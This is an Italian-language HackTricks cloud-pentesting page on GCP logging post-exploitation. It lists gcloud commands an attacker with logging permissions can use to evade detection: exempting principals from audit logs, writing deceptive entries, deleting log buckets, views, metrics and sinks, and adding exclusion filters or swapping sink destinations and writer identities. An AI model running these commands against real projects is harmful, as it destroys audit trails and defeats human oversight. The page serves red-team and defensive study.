Italian - Ht Cloud
HackTricks TrainingTwitterLinkedinSponsor

GCP - Logging Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Informazioni di base

Per ulteriori informazioni controlla:

GCP - Logging Enum

Per altri modi per interrompere il monitoraggio controlla:

GCP - Monitoring Post Exploitation

Logging predefinito

Per impostazione predefinita non verrai catturato solo per aver eseguito azioni di lettura. Per ulteriori informazioni controlla la sezione Logging Enum.

Aggiungi Principale Eccezionale

In https://console.cloud.google.com/iam-admin/audit/allservices e https://console.cloud.google.com/iam-admin/audit è possibile aggiungere principali per non generare log. Un attaccante potrebbe abusare di questo per evitare di essere catturato.

Leggi log - logging.logEntries.list

# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json

# Everything from a timestamp
gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=json

# Use these options to indicate a different bucket or view to use: --bucket=_Required  --view=_Default

Scrivi log - logging.logEntries.create

# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR

logging.buckets.delete

# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>

logging.links.delete

# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>

logging.views.delete

# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global

logging.views.update

# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"

logging.logMetrics.delete

# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>

logging.sinks.delete

# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>

logging.sinks.update

# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled

# Createa filter to exclude attackers logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --add-exclusion="name=exclude-info-logs,filter=severity<INFO"

# Change where the sink is storing the data - logging.sinks.update
gcloud logging sinks update <sink-name> new-destination

# Change the service account to one withuot permissions to write in the destination - logging.sinks.update
gcloud logging sinks update SINK_NAME --custom-writer-identity=attacker-service-account-email --project=PROJECT_ID

# Remove explusions to try to overload with logs - logging.sinks.update
gcloud logging sinks update SINK_NAME --clear-exclusions

# If the sink exports to BigQuery, an attacker might enable or disable the use of partitioned tables, potentially leading to inefficient querying and higher costs. - logging.sinks.update
gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables

Impara e pratica Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Impara e pratica Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Supporta HackTricks
PreviousGCP - KMS Post ExploitationNextGCP - Monitoring Post Exploitation

Last updated